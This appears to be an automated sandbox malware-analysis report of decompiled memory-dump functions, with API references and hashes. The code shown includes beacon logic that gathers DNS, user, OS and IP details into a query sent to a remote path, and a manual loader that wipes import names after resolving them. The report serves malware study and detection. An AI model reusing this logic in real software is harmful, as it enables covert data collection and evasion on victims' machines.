0x00bab0ab
0x00bab0ad
0x00bab0ae
0x00bab0af
0x00bab0b2
0x00bab0bc
0x00bab16d
0x00bab174
0x00bab17d
0x00bab0c2
0x00bab0c2
0x00bab0c8
0x00bab0ce
0x00bab0d1
0x00bab0d4
0x00bab0d8
0x00bab0dd
0x00bab0e2
0x00bab162
0x00000000
0x00bab0e4
0x00bab0e4
0x00bab0f0
0x00bab0f2
0x00bab14d
0x00bab14d
0x00bab153
0x00000000
0x00bab0f4
0x00bab103
0x00bab105
0x00bab106
0x00bab107
0x00bab10a
0x00bab10a
0x00bab10c
0x00000000
0x00bab10e
0x00bab10e
0x00bab158
0x00bab110
0x00bab110
0x00bab114
0x00bab11c
0x00bab121
0x00bab126
0x00bab132
0x00bab13a
0x00bab141
0x00bab147
0x00bab14b
0x00000000
0x00bab14b
0x00bab10e
0x00bab10c
0x00000000
0x00bab0f2
0x00bab166
0x00bab166
0x00bab166
0x00bab0e2
0x00bab182
0x00bab189

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 9fbae790a8405b9ad4af0bc583324f0bcc2dc998b13f762506872e69d3ad99b3
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: B421C4729042049FCB14DF68C8D0DABBBE5FF46350B4585A9E9259B246D730F925C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1D4C, Relevance: 34.7, APIs: 23, Instructions: 204
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00BA1D4C(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0xbad018; // 0x9599301a
				asm("bswap eax");
				_t28 =  *0xbad014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0xbad010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0xbad00c; // 0x81762942
				asm("bswap eax");
				_t31 =  *0xbad2a4; // 0x44fa5a8
				_t3 = _t31 + 0xbae633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d13b, _t30, _t29, _t28, _t27,  *0xbad02c,  *0xbad004, _t26);
				_t34 = E00BA6B47();
				_t35 =  *0xbad2a4; // 0x44fa5a8
				_t4 = _t35 + 0xbae673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E00BA6111(_t94);
				if(_t99 != 0) {
					_t86 =  *0xbad2a4; // 0x44fa5a8
					_t6 = _t86 + 0xbae8eb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0xbad238, 0, _t99);
				}
				_t100 = E00BA26A0();
				if(_t100 != 0) {
					_t81 =  *0xbad2a4; // 0x44fa5a8
					_t8 = _t81 + 0xbae8f3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0xbad238, 0, _t100);
				}
				_t101 =  *0xbad324; // 0x50a95b0
				_a32 = E00BA1B77(0xbad00a, _t101 + 4);
				_t43 =  *0xbad2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0xbad2a4; // 0x44fa5a8
					_t11 = _t77 + 0xbae8cd; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0xbad2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0xbad2a4; // 0x44fa5a8
					_t13 = _t74 + 0xbae8c6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0xbad238, 0, 0x800);
					if(_t103 != 0) {
						E00BA1BE3(GetTickCount());
						_t51 =  *0xbad324; // 0x50a95b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0xbad324; // 0x50a95b0
						__imp__(_t55 + 0x40);
						_t57 =  *0xbad324; // 0x50a95b0
						_t106 = E00BA1A30(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0xbac2a4);
							_t63 =  *0xbad2a4; // 0x44fa5a8
							_push(_t106);
							_t15 = _t63 + 0xbae252; // 0x616d692f
							_t65 = E00BA2773(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E00BA32F0(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E00BA5BEA();
								}
								HeapFree( *0xbad238, 0, _v48);
							}
							HeapFree( *0xbad238, 0, _t106);
						}
						HeapFree( *0xbad238, 0, _t103);
					}
					HeapFree( *0xbad238, 0, _a24);
				}
				HeapFree( *0xbad238, 0, _t108);
				return _a12;
			}

0x00ba1d4c
0x00ba1d4c
0x00ba1d4c
0x00ba1d51
0x00ba1d57
0x00ba1d61
0x00ba1d63
0x00ba1d63
0x00ba1d70
0x00ba1d7b
0x00ba1d7e
0x00ba1d89
0x00ba1d8c
0x00ba1d91
0x00ba1d94
0x00ba1d99
0x00ba1d9c
0x00ba1da8
0x00ba1db5
0x00ba1db7
0x00ba1dbd
0x00ba1dc2
0x00ba1dcd
0x00ba1dcf
0x00ba1dd2
0x00ba1dd9
0x00ba1ddd
0x00ba1ddf
0x00ba1de4
0x00ba1df0
0x00ba1df2
0x00ba1dfe
0x00ba1e00
0x00ba1e00
0x00ba1e0b
0x00ba1e0f
0x00ba1e11
0x00ba1e16
0x00ba1e22
0x00ba1e24
0x00ba1e30
0x00ba1e32
0x00ba1e32
0x00ba1e38
0x00ba1e4b
0x00ba1e4f
0x00ba1e56
0x00ba1e59
0x00ba1e5e
0x00ba1e69
0x00ba1e6b
0x00ba1e6e
0x00ba1e6e
0x00ba1e70
0x00ba1e77
0x00ba1e7a
0x00ba1e7f
0x00ba1e89
0x00ba1e8b
0x00ba1e93
0x00ba1eac
0x00ba1eb0
0x00ba1ebc
0x00ba1ec1
0x00ba1eca
0x00ba1edb
0x00ba1edf
0x00ba1ee8
0x00ba1eee
0x00ba1efb
0x00ba1f08
0x00ba1f0e
0x00ba1f1a
0x00ba1f20
0x00ba1f25
0x00ba1f26
0x00ba1f2d
0x00ba1f32
0x00ba1f38
0x00ba1f3e
0x00ba1f45
0x00ba1f4c
0x00ba1f52
0x00ba1f59
0x00ba1f5d
0x00ba1f68
0x00ba1f6d
0x00ba1f73
0x00ba1f7c
0x00ba1f7c
0x00ba1f8d
0x00ba1f8d
0x00ba1f9c
0x00ba1f9c
0x00ba1fab
0x00ba1fab
0x00ba1fbd
0x00ba1fbd
0x00ba1fcc
0x00ba1fdd

APIs

GetTickCount.KERNEL32 ref: 00BA1D63
wsprintfA.USER32 ref: 00BA1DB0
wsprintfA.USER32 ref: 00BA1DCD
wsprintfA.USER32 ref: 00BA1DF0
HeapFree.KERNEL32(00000000,00000000), ref: 00BA1E00
wsprintfA.USER32 ref: 00BA1E22
HeapFree.KERNEL32(00000000,00000000), ref: 00BA1E32
wsprintfA.USER32 ref: 00BA1E69
wsprintfA.USER32 ref: 00BA1E89
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BA1EA6
GetTickCount.KERNEL32 ref: 00BA1EB6
RtlEnterCriticalSection.NTDLL(050A9570), ref: 00BA1ECA
RtlLeaveCriticalSection.NTDLL(050A9570), ref: 00BA1EE8

Part of subcall function 00BA1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A5B
Part of subcall function 00BA1A30: lstrlen.KERNEL32(?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A63
Part of subcall function 00BA1A30: strcpy.NTDLL ref: 00BA1A7A
Part of subcall function 00BA1A30: lstrcat.KERNEL32(00000000,?), ref: 00BA1A85
Part of subcall function 00BA1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1AA2

StrTrimA.SHLWAPI(00000000,00BAC2A4,?,050A95B0), ref: 00BA1F1A

Part of subcall function 00BA2773: lstrlen.KERNEL32(?,00000000,00000000,00BA1F32,616D692F,00000000), ref: 00BA277F
Part of subcall function 00BA2773: lstrlen.KERNEL32(?), ref: 00BA2787
Part of subcall function 00BA2773: lstrcpy.KERNEL32(00000000,?), ref: 00BA279E
Part of subcall function 00BA2773: lstrcat.KERNEL32(00000000,?), ref: 00BA27A9

lstrcpy.KERNEL32(00000000,?), ref: 00BA1F45
lstrcpy.KERNEL32(00000000,00000000), ref: 00BA1F4C
lstrcat.KERNEL32(00000000,?), ref: 00BA1F59
lstrcat.KERNEL32(00000000,00000000), ref: 00BA1F5D

Part of subcall function 00BA32F0: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 00BA33A2

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00BA1F8D
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00BA1F9C
HeapFree.KERNEL32(00000000,00000000,?,050A95B0), ref: 00BA1FAB
HeapFree.KERNEL32(00000000,00000000), ref: 00BA1FBD
HeapFree.KERNEL32(00000000,?), ref: 00BA1FCC

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: fe336a431f42ddf06e324cde8c496ab2196d0ca7eebe9f478a564454c01d8b0b
Instruction ID: 5de3f70ca24ef3d3eb69780eafb2efd9b1628fe6d92f8ac355439bb11d024821
Opcode Fuzzy Hash: fe336a431f42ddf06e324cde8c496ab2196d0ca7eebe9f478a564454c01d8b0b
Instruction Fuzzy Hash: 48618B71504201AFC721AB68EC4AF9BBBE8EB4B340F050564F90AD7271DF35E906DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAD65, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00BAAD65(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xba0000;
				_t115 = _t139[3] + 0xba0000;
				_t131 = _t139[4] + 0xba0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xba0000;
				_v16 = _t139[5] + 0xba0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xba0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xbad1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xbad1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xbad1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xbad19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xbad1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xbad198; // 0x0
										 *_t102 = _t125;
										 *0xbad198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xbad19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x00baad74
0x00baad8a
0x00baad90
0x00baad92
0x00baad97
0x00baad9d
0x00baada2
0x00baada5
0x00baadb3
0x00baadba
0x00baadbd
0x00baadc0
0x00baadc1
0x00baadc4
0x00baadc7
0x00baadca
0x00baadcf
0x00baadde
0x00000000
0x00baade4
0x00baadee
0x00baadf8
0x00baadfd
0x00baadff
0x00baae09
0x00baae0c
0x00baae0f
0x00baae15
0x00baae17
0x00baae17
0x00baae1a
0x00baae1d
0x00baae22
0x00baae26
0x00baae39
0x00baae3b
0x00baaee3
0x00baaee3
0x00baaeea
0x00baaeed
0x00baaef7
0x00baaef7
0x00baaefb
0x00baaf79
0x00baaf7c
0x00baaf7e
0x00baaf7e
0x00baaf85
0x00baaf87
0x00baaf91
0x00baaf94
0x00baaf97
0x00baaf97
0x00000000
0x00baaefd
0x00baaf00
0x00baaf2e
0x00baaf38
0x00baaf3c
0x00baaf44
0x00baaf47
0x00baaf4e
0x00baaf58
0x00baaf58
0x00baaf5c
0x00baaf61
0x00baaf70
0x00baaf76
0x00baaf76
0x00baaf5c
0x00000000
0x00baaf07
0x00baaf0a
0x00baaf12
0x00baaf27
0x00baaf2c
0x00000000
0x00000000
0x00baaf2c
0x00000000
0x00baaf12
0x00baaf00
0x00baaefb
0x00baae41
0x00baae48
0x00baae58
0x00baae61
0x00baae65
0x00baaea8
0x00baaeb4
0x00baaedd
0x00baaeb6
0x00baaeba
0x00baaec0
0x00baaec8
0x00baaeca
0x00baaecd
0x00baaed3
0x00baaed5
0x00baaed5
0x00baaec8
0x00baaeba
0x00000000
0x00baaeb4
0x00baae6d
0x00baae70
0x00baae77
0x00baae87
0x00baae8a
0x00baae9a
0x00000000
0x00baaea0
0x00baae81
0x00baae85
0x00000000
0x00000000
0x00000000
0x00baae85
0x00baae52
0x00baae56
0x00000000
0x00000000
0x00000000
0x00baae56
0x00baae2f
0x00baae33
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BAADDE
LoadLibraryA.KERNEL32(?), ref: 00BAAE5B
GetLastError.KERNEL32 ref: 00BAAE67
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00BAAE9A

Strings

$, xrefs: 00BAADB3

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: c62adf4bb777d83a37a47ad797aa999b8fcdda38dcc87a1197847c9d245236f5
Instruction ID: c3ce149cdbbe0019ad284483f77c2796f742e7ffeee17bd78214ea3f60899fa9
Opcode Fuzzy Hash: c62adf4bb777d83a37a47ad797aa999b8fcdda38dcc87a1197847c9d245236f5
Instruction Fuzzy Hash: A7815DB5A04205EFDB24CF98D881BAEBBF5EF49300F248069E505E7250EB71ED05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA15EE, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00BA15EE(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xbad33c; // 0x50a9bb8
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00BA3586(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xbac1ac;
				}
				_t44 = E00BA5161(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00BA8D59(lstrlenW(0xbaeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xbaeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xbad2a4; // 0x44fa5a8
						_t73 =  *0xbad11c; // 0xbaab91
						_t18 = _t75 + 0xbaeb28; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00BA8D59(lstrlenW(0xbaec48) + _a8 + _t57 + _t58 + lstrlenW(0xbaec48) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00BA677C(_v16);
						} else {
							_t64 =  *0xbad2a4; // 0x44fa5a8
							_t31 = _t64 + 0xbaec48; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00BA677C(_v8);
				}
				return _v20;
			}

0x00ba15ee
0x00ba15f6
0x00ba15fc
0x00ba160c
0x00ba160f
0x00ba1614
0x00ba1619
0x00ba161b
0x00ba161b
0x00ba1624
0x00ba1629
0x00ba162e
0x00ba1634
0x00ba163e
0x00ba1647
0x00ba164e
0x00ba165c
0x00ba166e
0x00ba1673
0x00ba1678
0x00ba1681
0x00ba168a
0x00ba1693
0x00ba16a1
0x00ba16a9
0x00ba16ae
0x00ba16b1
0x00ba16bc
0x00ba16d3
0x00ba16d7
0x00ba170a
0x00ba16d9
0x00ba16dc
0x00ba16e4
0x00ba16ef
0x00ba16f7
0x00ba16ff
0x00ba1703
0x00ba1703
0x00ba16d7
0x00ba1712
0x00ba1717
0x00ba171e

APIs

GetTickCount.KERNEL32 ref: 00BA1603
lstrlen.KERNEL32(00000000,80000002), ref: 00BA163E
lstrlen.KERNEL32(?), ref: 00BA1647
lstrlen.KERNEL32(00000000), ref: 00BA164E
lstrlenW.KERNEL32(80000002), ref: 00BA165C
lstrlenW.KERNEL32(00BAEB28), ref: 00BA1665
lstrlen.KERNEL32(?), ref: 00BA16A9
lstrlen.KERNEL32(?), ref: 00BA16B1
lstrlenW.KERNEL32(?), ref: 00BA16BC
lstrlenW.KERNEL32(00BAEC48), ref: 00BA16C5

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 06ae207c3e44692844c6b2827e5bdb170ba134c549b8c76a918104637dae520d
Instruction ID: 9a0f8c11fa5e2df9d401d62b08e08796e06f9a5186762485c35629fb8c2ccae9
Opcode Fuzzy Hash: 06ae207c3e44692844c6b2827e5bdb170ba134c549b8c76a918104637dae520d
Instruction Fuzzy Hash: 55313576900209BBCF11AFA8CC8599EBFB9FF4A354F0544A5E914A7221EB31DA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003810DC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003810DC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x003810e5
0x003810eb
0x003810f0
0x003810f5
0x003811f6
0x003811fb
0x003811fb
0x003810fc
0x003810ff
0x00381102
0x00381107
0x003811f5
0x00000000
0x003811f5
0x0038110e
0x0038110e
0x00381112
0x00381118
0x0038111d
0x00000000
0x00000000
0x00381123
0x00381132
0x00381137
0x00381139
0x0038113c
0x00381141
0x0038114d
0x0038114d
0x00381150
0x00381154
0x003811da
0x003811da
0x003811dd
0x003811e0
0x003811e5
0x00000000
0x00000000
0x003811f4
0x00000000
0x003811f4
0x0038115e
0x00381161
0x00000000
0x00381163
0x00381163
0x0038116c
0x00381181
0x00381183
0x0038117a
0x0038117a
0x0038117a
0x00381165
0x00381165
0x00381165
0x00381186
0x00381186
0x0038118b
0x0038118d
0x0038118d
0x00381195
0x0038119b
0x003811a0
0x00000000
0x00000000
0x003811a4
0x003811a6
0x003811b4
0x003811b9
0x003811b9
0x003811c2
0x003811c5
0x003811c8
0x003811cc
0x00000000
0x003811ce
0x003811d7
0x003811d7
0x00000000
0x003811d7
0x003811d0
0x003811d0
0x00000000
0x003811d0
0x00381143
0x00381147
0x00000000
0x00000000
0x00000000
0x00381147
0x003811ed
0x00000000

APIs

LoadLibraryA.KERNEL32 ref: 00381112
lstrlenA.KERNEL32 ref: 00381128
memset.NTDLL ref: 00381132
GetProcAddress.KERNEL32(?,00000002), ref: 00381195
lstrlenA.KERNEL32(-00000002), ref: 003811AA
memset.NTDLL ref: 003811B4

Strings

~, xrefs: 003811ED

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: fcb52a8202744089ff1c64af4d2ddb3119dc19bf2b9c0ffe7d9b4fb36917aea7
Instruction ID: f04cf71edba10d1a3c1ba3cdaf7f4d5f7e0cb3401426df5fe925d33aa864a903
Opcode Fuzzy Hash: fcb52a8202744089ff1c64af4d2ddb3119dc19bf2b9c0ffe7d9b4fb36917aea7
